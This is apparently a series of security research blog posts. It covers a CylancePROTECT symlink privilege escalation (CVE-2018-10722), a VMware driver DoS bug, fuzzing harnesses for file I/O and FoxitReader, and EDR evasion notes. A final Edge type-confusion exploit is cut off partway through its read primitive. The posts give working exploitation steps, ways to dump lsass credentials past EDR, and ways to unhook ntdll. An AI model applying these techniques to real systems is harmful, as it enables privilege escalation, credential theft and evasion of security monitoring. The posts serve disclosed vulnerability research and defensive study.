Escalating Privileges with CylancePROTECT

1 May 2018 at 19:23

If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've run into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.

After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try to make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I fired up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.

Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced

CylanceUI Advanced Menu

Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get a high-level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.

CyUpdate Spawning as SYSTEM

The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:

  1. As a user, I could communicate with the CylanceSvc service and influence its behavior
  2. As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
  3. As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
CylanceUI and CylanceSvc writing to log

CyUpdate writing to log

The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:

Log folder and File Modify Permissions

Having modify permissions on a folder allows it to be set up as a mount point that redirects read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as to try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.

Log folder mount point created

After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.

CylanceSvc writing log to C:\Windows\

CyUpdate change log file permissions

Log file modify permissions

Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are set up like this:

  1. C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
  2. \RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll

One of James' symbolic link testing tools will automatically create this symlink chain when given the original file and the target destination. In this case the command looked like this: CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll. The result was:

Creating symlink chain to control filename

File with arbitrary name created in C:\Windows

At this point I've written a file to an arbitrary location with an arbitrary name and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.

Contents of C:\Windows\evil.dll

Verifying overwrite permissions

From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:

  1. Path contains .dll
  2. Result contains NOT
  3. Process is CyUpdate.exe

The resulting output in procmon looked like this:

libc.dll hijack identified in procmon

Now all I had to do was set up the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:

Gaining SYSTEM shell and stopping CylanceSvc

Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.

Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.

Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard-to-spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are kept to the minimum required.

Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.

The CVE assigned to this vulnerability is: CVE-2018-10722

Finding a Kernel 0-day in VMware vCenter Converter via Static Reverse Engineering

26 January 2022 at 22:40

I posted a poll on Twitter ("Next blog topic?") to decide what this blog post would be about, and the results indicated it should be about kernel driver reversing.

I figured I’d make it a bit more exciting by finding a new kernel 0-day to integrate into the blog post, so I started thinking about which driver would be a fun target.
I’ve reversed VMware drivers before, primarily ones relating to their Hypervisor, but I’ve also used their vCenter Converter tool before and wondered what attack surface that introduces when installed.

It turns out that it installs a kernel component (vstor2-x64.sys) that low-privileged users can interact with. We can see this driver installed with the name “vstor2-mntapi20-shared” in the “Driver” directory using Sysinternals’ WinObj.exe tool.

To confirm low-privileged users can interact with this driver, we take a look at the “Device” directory.
Drivers have various ways of communicating with user-land code. One common method is for the driver to expose a device that user-land code can open a handle to (using the CreateFile APIs). We find the device with the same name, double-click it and view its security attributes:

We see in the device security properties that the “Everyone” group has read & write permissions. This means low-privileged users can obtain a handle to the device and use it to communicate with the driver.

Note that the driver and device names in these directories are set in the driver’s DriverEntry when it is loaded by Windows. First the device is created using IoCreateDevice, usually followed by the creation of a symbolic link using IoCreateSymbolicLink to give user-land code access.

When a user-land process wants to communicate with a device driver, it will obtain a file handle to the device. In this case the code would look like:

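#include <windows.h>

// User-mode path to the device exposed by vstor2-x64.sys
#define USR_DEVICE_NAME L"\\\\.\\vstor2-mntapi20-shared"

// Opening the device results in the driver's IRP_MJ_CREATE handler being called
HANDLE hDevice = CreateFileW(USR_DEVICE_NAME,
                             GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE,
                             NULL,           // default security attributes
                             OPEN_EXISTING,  // the device must already exist
                             0,              // no special flags or attributes
                             NULL);          // no template file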

This code results in the driver's IRP_MJ_CREATE dispatch handler being called. The dispatch handlers are part of the DRIVER_OBJECT for the target driver, which is the first argument to the driver’s DriverEntry. This structure has a MajorFunction array whose entries can be set to function pointers that handle callbacks for various events (like the create handler being called when a process opens a handle to the device).

We know the first argument to DriverEntry for any driver is a pointer to the DRIVER_OBJECT structure (as in the image above). With this information we can follow where this variable is used to find the code that sets the function pointers in the MajorFunction array.

We can find out which MajorFunction index maps to which IRP_MJ_xxx function by looking at sample code provided by Microsoft, specifically on line 284 here.

Since we now know which array index maps to which function, we rename the functions with meaningful names as shown in the image above (e.g. we name entry 0xe ioctl_handler, as it handles DeviceIoControl messages from processes).
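As a rough aid for this renaming step, the index-to-name mapping can be sketched in C. The numeric values below are the IRP_MJ_xxx constants from the WDK headers; the helper major_function_name and the names it returns are hypothetical labels chosen for this illustration, not anything taken from the driver itself.

```c
#include <stddef.h>

/* Major function codes as defined in the WDK (wdm.h). */
#define IRP_MJ_CREATE          0x00
#define IRP_MJ_CLOSE           0x02
#define IRP_MJ_READ            0x03
#define IRP_MJ_WRITE           0x04
#define IRP_MJ_DEVICE_CONTROL  0x0e

/* Hypothetical helper: suggest a readable name for the function pointer
 * stored at DriverObject->MajorFunction[index]. */
static const char *major_function_name(unsigned index)
{
    switch (index) {
    case IRP_MJ_CREATE:         return "irp_mj_create";
    case IRP_MJ_CLOSE:          return "irp_mj_close";
    case IRP_MJ_READ:           return "irp_mj_read";
    case IRP_MJ_WRITE:          return "irp_mj_write";
    case IRP_MJ_DEVICE_CONTROL: return "ioctl_handler";
    default:                    return "unknown";  /* other indexes are not covered here */
    }
}
```

For example, major_function_name(0xe) yields "ioctl_handler", matching the name given to entry 0xe above.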

The read & write callbacks are called when a process calls ReadFile or WriteFile on the device handle. There are other callbacks too, which we won’t go through.

To start with, let's analyze the irp_mj_create handler and see what happens when we create a handle to this device driver.

By default, this is what we see:

Firstly, we can improve decompilation by setting the correct types for a1 and a2, which we know must conform to the DRIVER_DISPATCH specification.

Doing so results in the following:

There are a few things happening in this function. Two structures shown here that are usually important are:

  • DeviceExtension object in the DEVICE_OBJECT structure

  • FsContext object in the IRP->CurrentStackLocation->FileObject structure

The DeviceExtension object is a pointer to a buffer created and managed by the driver. It is accessible to the driver via the DEVICE_OBJECT structure (and thus accessible in all DRIVER_DISPATCH callbacks). Drivers typically create and use this buffer to manage state, variables and other information that must be reachable from a variety of locations. For example, if a driver supports functions to Open, Read, Write or Close TCP connections via IOCTLs, it may store its current state (e.g. whether the connection is Open or Closed) in the DeviceExtension buffer; whenever the Close function is called, it checks that state to ensure the connection can actually be closed. Essentially, it's just a buffer that the driver uses to store and retrieve information across a variety of contexts and functions.

The FsContext structure is similar and can also be used as an arbitrary buffer. The main difference is lifetime: the DEVICE_OBJECT structure is created by the driver during the IoCreateDevice call, which means the DeviceExtension buffer does not get torn down or re-created when a user process opens or closes a handle to the device. The FsContext structure, by contrast, is associated with a FILE_OBJECT structure that is created when CreateFile is called and destroyed when the handle is closed, meaning the FsContext buffer is per-handle.

From the decompiled code we see that a buffer of size 0x20 is allocated and set as the FsContext structure. We also see that the first 64 bits of this structure are set to v5, which corresponds to the DeviceExtension pointer. In other words, we have already figured out that the FsContext struct contains a pointer to the DeviceExtension as its first element.

E.g.

struct FsContext {
    PVOID pDevExt;
};

Figuring out the rest of the elements to the FsContext and DeviceExtension structures is a simple but sometimes tedious process of looking at all the DRIVER_DISPATCH functions for the driver (like the ioctl handler) and noting down what offsets are accessed in these structs and how they’re used (e.g. if offset 0x8 in the DeviceExtension is used in a KeAcquireSpinLockRaiseToDpc call, then we know that offset is a pointer to a KSPIN_LOCK object).

Taking the time to document the structures this way pays off: it helps greatly when trying to understand the decompilation, and with some effort we can transform the IRP_MJ_CREATE handler to look like the below:

When looking at the FsContext structure, for example, we can open IDA’s Local Types window and define it using C syntax, as I did below:

Note that as you figure out what each element is, you can define the elements as random junk and rename/retype them as you go (so long as you know the size of the structure, which we get easily here via the 0x20 size argument to ExAllocatePoolWithTag).
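A minimal sketch of such a placeholder definition is shown here, assuming a 64-bit target. Only the first field and the total size of 0x20 come from the analysis above; the unknown_XX field names are hypothetical fillers to be renamed and retyped as their purpose becomes clear, and uint64_t stands in for PVOID so the sketch compiles outside the WDK.

```c
#include <stddef.h>
#include <stdint.h>

/* Placeholder layout for the 0x20-byte per-handle FsContext buffer.
 * Only the first member is known so far; the rest are filler fields
 * that keep the overall size correct until they are understood. */
struct FsContext {
    uint64_t pDevExt;     /* +0x00: pointer to the DeviceExtension */
    uint64_t unknown_08;  /* +0x08: not yet identified */
    uint64_t unknown_10;  /* +0x10: not yet identified */
    uint64_t unknown_18;  /* +0x18: not yet identified */
};

/* Compile-time checks that the layout matches the observed allocation size. */
_Static_assert(sizeof(struct FsContext) == 0x20, "FsContext must be 0x20 bytes");
_Static_assert(offsetof(struct FsContext, unknown_08) == 0x08, "unexpected padding");
```

Keeping the size assertion in place means that retyping a field later (for example, splitting unknown_08 into two 32-bit members) fails loudly if the total size drifts away from 0x20.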

Now that we’ve analyzed the IRP_MJ_CREATE handler and determined there’s nothing stopping us from creating a handle, we can look into how the driver handles Read, Write & DeviceIOControl requests from user processes.

In analyzing these handlers, we see heavy usage of the FsContext and DeviceExtension buffers, including checks on whether its contents are initialized.

It turns out there are quite a few vulnerabilities in this driver that are reachable if you form your input correctly to hit their code paths. While I won’t go through all of them (some are still pending disclosure!), we will take a look at one which is a simple user->kernel DoS.

In IOCTL 0x2A0014 we see the DeviceExtension buffer get memset to 0 to clear its contents:

This is followed by a memmove that copies 0x100 bytes from the user’s input buffer to the DeviceExtension buffer, meaning the byte offsets we copy into are user controlled (I denote this with a _uc tag at the end of the variable name):

During this IOCTL, another field in the DeviceExtension also gets set (which seems to indicate that the DeviceExtension buffer has been initialized):

This is critical to triggering the bug (which we will see next).
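As a side note, the IOCTL code 0x2A0014 used here can be split into its component fields. The sketch below assumes the standard Windows CTL_CODE bit layout (device type in bits 16-31, required access in bits 14-15, function number in bits 2-13, transfer method in bits 0-1); the struct and function names are hypothetical and exist only for this illustration.

```c
#include <stdint.h>

/* Fields packed into a Windows I/O control code by the CTL_CODE macro. */
struct ioctl_fields {
    uint32_t device_type;  /* bits 16..31 */
    uint32_t access;       /* bits 14..15 (0 = FILE_ANY_ACCESS) */
    uint32_t function;     /* bits 2..13 */
    uint32_t method;       /* bits 0..1  (0 = METHOD_BUFFERED) */
};

/* Hypothetical helper: unpack an IOCTL code into its four fields. */
static struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}
```

Decoding 0x2A0014 this way gives device type 0x2A, function 5, access 0 and method 0. Under the layout assumed above, method 0 corresponds to METHOD_BUFFERED and access 0 to FILE_ANY_ACCESS.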

So, the actual bug doesn’t live in the IOCTL handlers, instead it lives in the IRP_MJ_READ and IRP_MJ_WRITE handlers (note that in this case the READ and WRITE handlers are the same function, they just check the provided IRP to determine if the operation is a READ or WRITE).

In this handler, we can see a check to determine if the DeviceExtension’s some_if_field has been initialized:

After clearing this condition, the bug can be seen in sub_12840 in the following condition statement:

Here we see I denoted the unkn13 variable in the DeviceExtension buffer with _uc, which means it's user controlled (in fact, it's set during the memmove call we saw earlier).

From the decompilation we see that the code does a % operation on our user controllable value, this translates to a div instruction:

If you’re familiar with x86, you’ll know that a div instruction with a divisor of 0 causes a divide-by-zero exception. We can easily trigger this here by providing an input buffer filled with 0 when we call IOCTL 0x2A0014 to set the user-controllable contents in the DeviceExtension buffer. We can then reach the vulnerable code by attempting to read or write the device handle using the ReadFile or WriteFile APIs.

In fact there are multiple ways to trigger this. The DeviceExtension buffer is essentially a global buffer and no locking is used when reading this value, so race conditions exist where one thread is calling IOCTL 0x2A0014 while another is calling the read or write handler, such that this div instruction may be hit right after the memset operation in IOCTL 0x2A0014 clears the DeviceExtension buffer to 0.

In fact, there are multiple locations such race conditions would affect the code paths taken in this driver!
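To make the failure mode concrete, here is a small user-mode sketch of the kind of check whose absence causes the crash. It is not the driver's code: checked_mod is a hypothetical helper, and the point is only that a divisor derived from user input needs to be copied once into a local and validated before the % operation.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: compute value % divisor only when it is safe.
 * The divisor is passed by value, so the caller's single read of the
 * shared field is the value that gets both checked and used. */
static bool checked_mod(uint32_t value, uint32_t divisor, uint32_t *result)
{
    if (divisor == 0) {
        return false;  /* would otherwise raise a divide-by-zero exception */
    }
    *result = value % divisor;
    return true;
}
```

Passing the divisor by value matters for the race described above: checking a shared field and then re-reading it for the division would still leave a window in which another thread zeroes it.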

Overall, this driver is a good target for reverse engineering practice with Kernel drivers due to its use of not only IOCTLs, but also read & write handlers + the use of the FsContext and DeviceExtension buffers that need to be reversed to understand what the driver is doing, and how we can influence it. All the bugs found in this driver were purely from static reverse engineering as a fun exercise.

Interested in Reverse Engineering & Vulnerability Research Training?

We frequently run public sessions (or private sessions upon request) for trainings in Reverse Engineering & Vulnerability Research, see our Upcoming Trainings or Subscribe to get notified of our next public session dates.

Emulating File I/O for In-Memory Fuzzing

12 October 2020 at 14:12

One problem I’ve encountered during fuzzing is how to best fuzz an application that performs multiple file reads on an input file, but in a performant way (e.g. in-memory without actually touching disk). For example, say an application takes an input file path from a user and parses the file. If the application loads the entire file into a single buffer to parse, this is simple to fuzz in-memory (we can modify the buffer in-memory and resume). However, if the target performs multiple reads on a file from disk, how can we fuzz it performantly?

Of course if we’re fuzzing by replacing the file on disk for each fuzz case we can fuzz such a target, but for performance if we’re fuzzing entirely in-memory (or using a snapshot-fuzzer that doesn’t support disk-based I/O) we need to ensure each read operation the target performs on our input does not actually touch disk, but instead reads from memory.

The method I decided to implement for my fuzzing was to hook the different file IO operations (e.g. ReadFile) and implement my own custom handlers for these functions that redirect the read operations to memory instead of disk. This has multiple benefits:

  1. We eliminate syscalls, as lots of file operations result in syscalls and my custom handler does not use syscalls, we avoid context switching into the kernel and obtain better perf

  2. We keep track of different file operations but it all operates on a memory-mapped version of our input file, this means we can mutate the entire mem-mapped file once and guarantee all ReadFile calls will be on our mutated Memory-mapped file

The normal operation of reading a file (without using my hooks) is:

  1. CreateFile is called on a file target

  2. ReadFile is used on the target to read into a buffer (resulting in syscalls and disk IO)

  3. Process parses the buffer

  4. ReadFile is used on the target to read more from the file on disk

  5. Process continues to parse the buffer

Process Reading from Disk without Hooks

With our hooks, the operations instead look like:

  1. CreateFile is called on a file target (our hook memory maps the target once entirely in-memory)

  2. ReadFile is used on the target to read into a buffer (resulting in our custom ReadFile implementation being called via our hook, which handles the ReadFile by returning contents from our in-memory copy of the file, resulting in no syscalls or disk IO)

  3. Process parses the buffer

  4. ReadFile is used on the target to read more from the file (in-memory again, just like the first ReadFile)

  5. Process continues to parse the buffer

Process Reading a File with our Hooks (In-Memory)

This greatly simplifies mutation and eliminates syscalls for the file IO operations.
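The core of such a read handler can be sketched in portable C. This is not the code from the FileHook repository: struct mem_file and mem_read are hypothetical names, and the sketch only models the behaviour described above, where each read copies from an in-memory image of the file and advances a file position, returning fewer bytes (or zero) near the end of the file.

```c
#include <stddef.h>
#include <string.h>

/* In-memory stand-in for an open file: the whole input plus a read cursor. */
struct mem_file {
    const unsigned char *data;  /* fuzz input mapped into memory */
    size_t size;                /* total length of the input */
    size_t pos;                 /* current file position */
};

/* Hypothetical read handler: copy up to `want` bytes from the current
 * position into `buf`, advance the position, and return the number of
 * bytes actually copied (0 once the end of the input is reached). */
static size_t mem_read(struct mem_file *f, void *buf, size_t want)
{
    size_t left = f->size - f->pos;
    size_t n = want < left ? want : left;
    memcpy(buf, f->data + f->pos, n);
    f->pos += n;
    return n;
}
```

Because every read is served from the same buffer, mutating that buffer once per fuzz case and resetting pos to 0 is enough to make all subsequent reads see the mutated input.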

The implementation wasn’t complex. MSDN has good documentation on how the APIs behave, so we can emulate them and write a test suite alongside to verify the accuracy of our emulation.

The code for this can be found on my GitHub: https://github.com/Kharos102/FileHook

Fuzzing FoxitReader 9.7’s ConvertToPDF

21 August 2020 at 15:12

Inspiration to create a fuzzing harness for FoxitReader’s ConvertToPDF function (targeting version 9.7) came from discovering Richard Johnson’s fuzzer for a previous version of FoxitReader.

(found here: https://www.cnblogs.com/st404/p/9384704.html).

Multiple changes have since been introduced in the way FoxitReader converts an image to a PDF, including the introduction of new vtable entries, the necessity to load the main FoxitReader.exe binary (including fixing the IAT and modifying data sections to contain valid handles to the current process heap), and more.

The source for my version of the fuzzing harness targeting version 9.7 can be found on my GitHub: https://github.com/Kharos102/FoxitFuzz9.7

Below is a quick walkthrough of the reversing and coding performed to get this harness working.

Firstly — based on the existing work from the previous fuzzers available, we know that most of the calls for the conversion of an image to a PDF occur via vtable function calls from an object returned from ConvertToPDF_x86!CreateFXPDFConvertor, however this could also be found manually by debugging the application and adding a breakpoint on file read accesses to the image we supply as a parameter to the conversion function, and then walking the call stack.

To start our harness, I decided to analyse how the actual FoxitReader.exe process sets up objects required for the conversion function by setting a breakpoint for the CreateFXPDFConvertor function.

Next, by stepping out and setting a breakpoint on all the vtable function pointers for the returned object, we can discover what order these functions are called along with their parameters as this will be necessary for us to setup the object before calling the actual conversion routine.

Dumping the Object’s VTable

We know how to view the vtable as the pointer to the vtable is the first 4-bytes (32bit) when dumping the object.

During this process we notice multiple differences compared to the older versions of FoxitReader, including changes to existing function prototypes and the introduction of new vtable functions that must be called.

After executing and noting the details of execution, we hit the main conversion function from the vtable of our object, here we can analyse the main parameter (some sort of conversion buffer structure) by viewing its memory and noting its contents.

First we see that the initial 4 bytes are a pointer to an offset within the FoxitReader.exe image.

Buffer Structure Analysis

This means our harness will have to load the FoxitReader image in-memory to also supply a valid pointer (we also have to fix its IAT and modify the image too, as we discover after testing the harness).

Then we continue noting down the buffer’s contents, including the input file path at offset +0x1624, the output file path at offset +0x182c, and more (including a version string).

Finally after the conversion the object is released and the buffer is freed.

After noting all the above we can make a harness from the information discovered and test.

During testing, certain issues were discovered and accounted for. These included exceptions in the copy of FoxitReader.exe loaded into memory, caused by its imports being used; this was resolved by fixing up the image's IAT when it is loaded.

Additionally, calls to HeapAlloc were occurring where the heap handle was obtained via an offset in the FoxitReader image loaded in-memory, but that handle was uninitialised. This was fixed by writing the current process heap handle into the FoxitReader image at the offset HeapAlloc was expecting.

Overall the process was not long and the resulting harness allows for fuzzing of the ConvertToPDF functionality in-memory for FoxitReader 9.7.

EDR Observations

20 August 2020 at 15:13

EDR Primer

EDRs generally contain the following components:

  • Self-Protection

  • Hooking Engine

  • Virtualization/Sandbox/Emulation

  • Log/Alert Generation

  • Network Comms

Quick Primer: Kernel Callbacks

EDRs also utilize kernel callbacks exposed by the Windows NT kernel, including:

  • PsSetCreateProcessNotifyRoutine

  • PsSetLoadImageNotifyRoutine

  • PsSetCreateThreadNotifyRoutine

  • ObRegisterCallbacks

  • CmRegisterCallback

Exported callback routines in ntoskrnl.exe

These callbacks may be used by kernel drivers such that when an event happens (process creation, registry modifications, handle creations, etc) the kernel driver is notified (pre or post op) and may interfere with the operation or result.

A common usage of this is for EDRs to be notified of process creations and inject their own userland DLLs (usually to hook NTDLL) in the newly created processes before they execute.

Additionally EDRs may intercept handle creation events and block those that occur on their protected processes (for example, in self-protection mode they may prevent other processes from obtaining handles to their processes).

Quick Primer: Disassembling Callbacks

Callbacks can be enumerated and disassembled on Windows via Kernel Debugging (or in-kernel disassembling e.g. by compiling a kernel driver with disassembly functionality such as via Capstone).

If using KD/Windbg, we can leverage public symbols to first disassemble the function PsSetCreateProcessNotifyRoutine with the command u nt!PsSetCreateProcessNotifyRoutine

Disassembly of Nt!PsSetCreateProcessNotifyRoutine in Windbg

We then follow any initial JMP (depending on the version of ntoskrnl.exe) to the main implementation of the function (e.g. nt!PspSetCreateProcessNotifyRoutine)

Continue disassembling the function and look for a LEA instruction on the callback array symbol. Callbacks are stored in arrays of an undocumented EX_CALLBACK structure from which we can discover the function pointer that points to the actual callback function registered for a particular driver.

LEA instruction operating on the callback array

As shown above, the callback array used in the LEA instruction on the last line (loaded into R13) has the symbol nt!PspCreateProcessNotifyRoutine.

Next, we dump the contents of the callback array:

Dumping Contents of the Callback Array

Here the command dq nt!PspCreateProcessNotifyRoutine was used to dump the contents of the callback array symbol as quadwords.

We can resolve the callback function registered for each of these entries by changing the last hex digit of an entry from F to 8. The resulting address contains a pointer to the function registered for the callback:

Disassembling a Callback Function

Above, we chose the first entry, ffff998ae70d3b8f, and changed its last hex digit so that the value becomes ffff998ae70d3b88. We then disassembled the function it points to using the command u poi(ffff998ae70d3b88), discovering that this is the callback function with the symbol nt!ViCreateProcessCallback.
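The F-to-8 adjustment can be expressed as simple pointer arithmetic. The sketch below rests on two assumptions that are consistent with the example above but not documented by Microsoft: that the low four bits of each array entry are bookkeeping bits rather than address bits, and that the function pointer lives at offset 8 of the block the entry points to. The function name is hypothetical.

```c
#include <stdint.h>

/* Hypothetical helper: given a raw entry from the callback array, return
 * the address of the field that holds the registered function pointer.
 * Assumes the low 4 bits are not part of the address and that the
 * function pointer is stored 8 bytes into the referenced block. */
static uint64_t callback_function_field(uint64_t entry)
{
    uint64_t block = entry & ~(uint64_t)0xF;  /* strip the low 4 bits */
    return block + 8;                         /* field holding the function pointer */
}
```

For the entry used above, callback_function_field(0xffff998ae70d3b8f) evaluates to 0xffff998ae70d3b88, the same address that was passed to poi() in the debugger.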

Hooking

Hooking techniques are commonly used by EDRs to intercept userland functions for API monitoring or blocking. The following demonstrates a common use for hooking where an EDR registers for process callback notifications and injects a DLL into each newly created process, this DLL then hooks ntdll.dll functions to block/alert/monitor malicious behaviour (e.g. blocking calls to NtReadVirtualMemory where the target process handle represents the lsass process).

Process Injection via Callbacks

EDRs may also leverage sandbox, emulation or virtualization to run a binary in isolation and log API usage.

Common Weaknesses

The following list represents common weaknesses identified in multiple EDR solutions

Binary Padding

Scanning and emulation of a binary may be used to detect malicious behaviour, however many EDRs (and AVs) have file size limitations on the file to analyse.

As a result, appending junk to the end of a binary until it is roughly 100 MB in size may be enough to prevent the EDR/AV from analysing it (and due to the PE32/PE32+ format, junk appended at the end of an executable will not affect its execution).

This is effective against products that heavily rely on an emulation & scanning layer to detect threats.

Unmonitored APIs

Typical APIs used for malicious activity (e.g. combinations of VirtualAllocEx, WriteProcessMemory & CreateRemoteThread) may be alerted on by EDRs for process injection.

However, performing the same or similar actions with different sets of APIs may evade EDRs and go unnoticed.

For example, in the case of dumping sensitive process memory (like that of the lsass process), EDRs may not alert on handle creation for the target process, but may instead alert when an API like MiniDumpWriteDump or ReadProcessMemory is called on the target.

However, if we clone the target process with PssCaptureSnapshot and dump the memory of the cloned lsass process instead, we may bypass such detections. This stems from the following main factors:

  1. Simple handle creations on a target process are permitted;

  2. Cloning lsass is permitted; and

  3. Dumping memory of non-sensitive processes is permitted

By cloning lsass, the cloned lsass process doesn’t get the same protections by the EDR as the original lsass process, thereby permitting dumping of the lsass clone.

This can be performed using the Windows APIs, or by using tools like ProcDump.exe with the -r flag.

Another example is DLL injection via Windows hooks (e.g. leveraging the SetWindowsHookEx API). This method of process injection does not rely on the typical Windows injection steps of opening a process, writing into the process memory and then spawning a new thread, and can bypass typical process injection detections.

Breaking Process Trees

EDRs leverage process trees for detecting malicious behaviour (e.g. alerting if word.exe spawns cmd.exe), however we can leverage COM objects such as C08AFD90-F2A1-11D1-8455-00A0C91F3880 that exposes the ShellExecute function to spawn arbitrary processes under the explorer.exe process, even from within VBScript running under word.exe.

There are other techniques too (e.g. leveraging RPC) that may also be applicable to break process-tree based detections.

Attacking EDRs

EDR weaknesses also include certain design flaws that make them susceptible to subversion.

For example, as shown above, userland hooking may be key to an EDR’s detection capabilities (such that without it, the product may be rendered useless).

EDRs that hook userland APIs via hooking ntdll.dll may be subverted by loading a fresh copy of ntdll.dll into the process and redirecting (via hooks) our API calls to the newly loaded (and unhooked by EDR) ntdll.

This technique alone may be enough to bypass EDR hooks and then perform malicious actions (like lsass dumping) without any alerts or detections.

EDRs also expose a lot of attack surface due to their massive codebase (drivers, IPC, support for various file formats), which may make them susceptible to a range of 0-day vulnerabilities. As such, proper testing of these products should be a priority.

Exploit Development: Browser Exploitation on Windows - CVE-2019-0567, A Microsoft Edge Type Confusion Vulnerability (Part 3)

7 April 2022 at 00:00

Introduction

In part one of this blog series on “modern” browser exploitation, targeting Windows, we took a look at how JavaScript manages objects in memory via the Chakra/ChakraCore JavaScript engine and saw how type confusion vulnerabilities arise. In part two we took a look at Chakra/ChakraCore exploit primitives and turning our type confusion proof-of-concept into a working exploit on ChakraCore, while dealing with ASLR, DEP, and CFG. In part three, this post, we will close out this series by making a few minor tweaks to our exploit primitives to go from ChakraCore to Chakra (the closed-source version of ChakraCore which Microsoft Edge runs on in various versions of Windows 10). After porting our exploit primitives to Edge, we will then gain full code execution while bypassing Arbitrary Code Guard (ACG), Code Integrity Guard (CIG), and other minor mitigations in Edge, most notably “no child processes” in Edge. The final result will be a working exploit that can gain code execution with ASLR, DEP, CFG, ACG, CIG, and other mitigations enabled.

From ChakraCore to Chakra

Since we already have a working exploit for ChakraCore, we now need to port it to Edge. As we know, Chakra (Edge) is the “closed-source” variant of ChakraCore. There are not many differences between how our exploits will look (in terms of exploit primitives). The only thing we need to do is update a few of the offsets from our ChakraCore exploit to be compliant with the version of Edge we are exploiting. Again, as mentioned in part one, we will be using an UNPATCHED version of Windows 10 1703 (RS2). Below is an output of winver.exe, which shows the build number (15063.0) we are using. The version of Edge we are using has no patches and no service packs installed.

Moving on, below you can find the code that we will be using as a template for our exploitation. We will name this file exploit.html and save it to our Desktop (feel free to save it anywhere you would like).

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
